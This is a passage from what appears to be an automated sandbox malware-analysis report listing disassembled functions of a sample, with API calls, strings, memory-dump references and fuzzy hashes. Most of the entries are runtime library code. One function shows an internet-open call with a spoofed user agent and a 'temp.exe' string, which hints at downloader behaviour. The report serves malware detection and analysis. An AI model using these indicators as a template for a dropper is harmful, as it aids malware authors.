                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0017558C
                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00175593
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 001755CD
                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 001755D4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                • Opcode ID: 7280f7730db21db78bf30ea35ff8971a0e77d6ab2321572e30405c2711e6b39b
                                                                                                                                                                                                • Instruction ID: 8e5e3993cce5f681e1dc43c45d508d82532867408405dd9271e3c60cd86ec731
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7280f7730db21db78bf30ea35ff8971a0e77d6ab2321572e30405c2711e6b39b
                                                                                                                                                                                                • Instruction Fuzzy Hash: EC219271600A05AFDB10AF66CC9196BB7BBFF24364711C528F81D97250DBB2ED509BA0
                                                                                                                                                                                                Function 0017661F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00176627
                                                                                                                                                                                                  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017665F
                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017667F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                • Opcode ID: ed8d4de38b61a8313895a0cce2a6034686c924a9743f8084f95712d720a1fdf9
                                                                                                                                                                                                • Instruction ID: c7b3b43369ac515e4d1a4083ae2b1c1a1c498432903517dce702dc5c946b77eb
                                                                                                                                                                                                • Opcode Fuzzy Hash: ed8d4de38b61a8313895a0cce2a6034686c924a9743f8084f95712d720a1fdf9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411C0B2901A15BEAB1227B59C8ECAF697CDF993D83608128FC0D92101FB35DE4046B9
                                                                                                                                                                                                Function 0014E0D4 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Func_class$H_prolog3
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3413606670-0
                                                                                                                                                                                                • Opcode ID: 97704eab994baf34e215bee576684a3c3728260918d3f526c41efb83bb7304b9
                                                                                                                                                                                                • Instruction ID: d0cea862c74103f716a78133557e74eb2278caa187c3a1570a5019f44a9aa6bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97704eab994baf34e215bee576684a3c3728260918d3f526c41efb83bb7304b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 72214C70906288DFCF01DFA8C5946DDBBF8BF28304F6540ADE805A7252DB749B49CB96
                                                                                                                                                                                                Function 0017E437 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000), ref: 0017E44E
                                                                                                                                                                                                • GetLastError.KERNEL32(?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?,?,?,00170CCD,?), ref: 0017E45A
                                                                                                                                                                                                  • Part of subcall function 0017E420: CloseHandle.KERNEL32(FFFFFFFE,0017E46A,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?,?), ref: 0017E430
                                                                                                                                                                                                • ___initconout.LIBCMT ref: 0017E46A
                                                                                                                                                                                                  • Part of subcall function 0017E3D6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0017E405,0017B28E,?,?,0017072A,?,00000000,00000000,?), ref: 0017E3E9
                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0017B2A1,00000000,00000001,?,?,?,0017072A,?,00000000,00000000,?), ref: 0017E47F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                • Opcode ID: b74da0006d2b9eb88b22b94e661f24eac192464dd268b17aefa4fabd8b11d209
                                                                                                                                                                                                • Instruction ID: d29656097f0dc0dd329009090e6555dfec23375dc0e0ea63ad666628ca43aa3b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b74da0006d2b9eb88b22b94e661f24eac192464dd268b17aefa4fabd8b11d209
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F0C036540225BBCF221FD5DC0899A3FB6FB493A1F058054FA1ED6531D7328DA0DB94
                                                                                                                                                                                                Function 00162ADD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 00162B02
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                • Opcode ID: 47e3034d0bf22f278a6a5b6ef1306240cef614ec9fa158a01e7a7a9078f7d1d8
                                                                                                                                                                                                • Instruction ID: 964edff061a839ceede7cc003e90e0f6b1e5921fe7c92c36520ca32c648ba9cb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e3034d0bf22f278a6a5b6ef1306240cef614ec9fa158a01e7a7a9078f7d1d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9414871900609AFCF16DF98CD81EEEBBB5FF48300F188199F908AB261D3369961DB51
                                                                                                                                                                                                Function 001576CE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001576D8
                                                                                                                                                                                                  • Part of subcall function 001461C0: __EH_prolog3_GS.LIBCMT ref: 001461C7
                                                                                                                                                                                                  • Part of subcall function 001461C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014E19F: __EH_prolog3.LIBCMT ref: 0014E1A6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 001576E4
                                                                                                                                                                                                • temp.exe, xrefs: 001577C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3H_prolog3_$InternetOpen
                                                                                                                                                                                                • String ID: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$temp.exe
                                                                                                                                                                                                • API String ID: 2236497292-3505050493
                                                                                                                                                                                                • Opcode ID: f32d5e026baa0effaf3f73e8ee513b62727dd918c45e77fb37f2d704b2e6abfc
                                                                                                                                                                                                • Instruction ID: 152ca6aa597bb71a9981c5c6a0c054eb8e26d94f31c57950bcf4f2ddb3610a3d
                                                                                                                                                                                                • Opcode Fuzzy Hash: f32d5e026baa0effaf3f73e8ee513b62727dd918c45e77fb37f2d704b2e6abfc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B418031D00248EADF05EBB4D896BDDB775AF28300F5084A8E515B70E2EB745B08CB62
                                                                                                                                                                                                Function 0015C0F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • stoull argument out of range, xrefs: 0015C267
                                                                                                                                                                                                • invalid stoull argument, xrefs: 0015C25D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_catch_
                                                                                                                                                                                                • String ID: invalid stoull argument$stoull argument out of range
                                                                                                                                                                                                • API String ID: 1329019490-980025665
                                                                                                                                                                                                • Opcode ID: 4318639802de8004efbc08a5b5040f6d3d6717e6c8853bad029e9fee82ec6ff6
                                                                                                                                                                                                • Instruction ID: 3d7a3a4249dd850efd948c3ac7ab24910db39a6bc86fedbd75fb441ef98bdb10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4318639802de8004efbc08a5b5040f6d3d6717e6c8853bad029e9fee82ec6ff6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E414B31D00248DFCF04DF98C881ADCBBB1BF64315F658159E825BB261D770AE85CB94
                                                                                                                                                                                                Function 0014E5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_
                                                                                                                                                                                                • String ID: H$value
                                                                                                                                                                                                • API String ID: 2427045233-2917141609
                                                                                                                                                                                                • Opcode ID: 0c8f84e170f8cb8b08c8a20835f71b87578575225ffff5c8170bf2071778967e
                                                                                                                                                                                                • Instruction ID: 97558be6d3406d058d14e2083734cc077108c4b99f35c3d67342e4e4c2549d76
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c8f84e170f8cb8b08c8a20835f71b87578575225ffff5c8170bf2071778967e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 65319AB1D01248DFEB04EBA4C946BEEBBB4AF29310F5045ACE508B71A2D7745F09CB52
                                                                                                                                                                                                Function 0014F10F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_
                                                                                                                                                                                                • String ID: H$value
                                                                                                                                                                                                • API String ID: 2427045233-2917141609
                                                                                                                                                                                                • Opcode ID: e4020cd78749a497b5e953225c3e216e5d61f7f1b0412b1a68abae6cb02ccca2
                                                                                                                                                                                                • Instruction ID: 00560374abf881b5dc3f5950394cca9f8e43d7b51a30f957a3ba1d71a67e9297
                                                                                                                                                                                                • Opcode Fuzzy Hash: e4020cd78749a497b5e953225c3e216e5d61f7f1b0412b1a68abae6cb02ccca2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93319DB1C01248EFEB04DBB8C945BDDBBB4AF29314F5084ACE119B72A2D7745B09CB25
                                                                                                                                                                                                Function 00145FB9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00145FC0
                                                                                                                                                                                                  • Part of subcall function 00145D26: __EH_prolog3_GS.LIBCMT ref: 00145D2D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                                • String ID: at line $, column
                                                                                                                                                                                                • API String ID: 3355343447-191570568
                                                                                                                                                                                                • Opcode ID: 1d697f367073a4c77fa17b4b67f7e4b40920f70dfa3bf1a985a979f502b2c671
                                                                                                                                                                                                • Instruction ID: 12cee2f360f9a5b3a0a2f857d786ba3e033a29ade92624cc77e87ca1a582b989
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d697f367073a4c77fa17b4b67f7e4b40920f70dfa3bf1a985a979f502b2c671
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C21C270E402059FDB08EFA8C8927AEBBF1AF94300F55452DE115E7392DBB45B01CB92
                                                                                                                                                                                                Function 00146543 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_
                                                                                                                                                                                                • String ID: /?#$://
                                                                                                                                                                                                • API String ID: 2427045233-1756703676
                                                                                                                                                                                                • Opcode ID: 3d0796466d33fab8ee6656626ed945593291b3c2f39db795109260bad68d8d95
                                                                                                                                                                                                • Instruction ID: cfb33e7a9fa936cd378c9607bf1228781993ec1a6ae15ae375766e7a4805e022
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0796466d33fab8ee6656626ed945593291b3c2f39db795109260bad68d8d95
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11AA302042248ACF289B249DA1BFE3770AF52318F25426DF1666B1E1CB705A45CEA1
                                                                                                                                                                                                Function 00157B46 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00157B4D
                                                                                                                                                                                                  • Part of subcall function 0014A6BD: __EH_prolog3.LIBCMT ref: 0014A6C4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                • String ID: 3e3$4e4
                                                                                                                                                                                                • API String ID: 431132790-2404590204
                                                                                                                                                                                                • Opcode ID: d4a221eebe43ce111555083141b53b467f84ca3242ff02974584452579e46237
                                                                                                                                                                                                • Instruction ID: cd276f2a5c5a147af5a3e7c0a0a1053ecdcf5a4b0df72b0d5199e97f064fe92a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a221eebe43ce111555083141b53b467f84ca3242ff02974584452579e46237
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9511A971A00609AFDB14EFBCC84569EBAB59F58720F10473DE025E72D1CB749F058752
                                                                                                                                                                                                Function 00156D27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                • String ID: : 0x$invalid UTF-8 byte at index
                                                                                                                                                                                                • API String ID: 431132790-1231261809
                                                                                                                                                                                                • Opcode ID: 4f521bbe6c437271dfca01997a40d3cbe212298ccbcac8e45ea8167d7db68abe
                                                                                                                                                                                                • Instruction ID: a93047a7a6e85670749b3d5eb355e47d29884b15fda2cad62d3199888130b8bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f521bbe6c437271dfca01997a40d3cbe212298ccbcac8e45ea8167d7db68abe
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48018BB0B44305ABDF1CAFB8C88155EB6B2AF58304B41483DF506E7392CB759A048B96
                                                                                                                                                                                                Function 001556A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001556AA
                                                                                                                                                                                                  • Part of subcall function 001568CD: __EH_prolog3.LIBCMT ref: 001568D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                                • String ID: .txt$1735725939
                                                                                                                                                                                                • API String ID: 3355343447-161451348
                                                                                                                                                                                                • Opcode ID: a56b4fd298cb843c5fcda318f1bc2c2cd246919fb4519e7c63a6677bb2e87ceb
                                                                                                                                                                                                • Instruction ID: 4639c0ac9f28bc0047033326648db0aa35dc00dbd2e4e0169a8a90d5360eb90f
                                                                                                                                                                                                • Opcode Fuzzy Hash: a56b4fd298cb843c5fcda318f1bc2c2cd246919fb4519e7c63a6677bb2e87ceb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6401D670505204CBCF08F7A0E5A29DC77B1EF68320F94422DE041271E2DF701E86CB96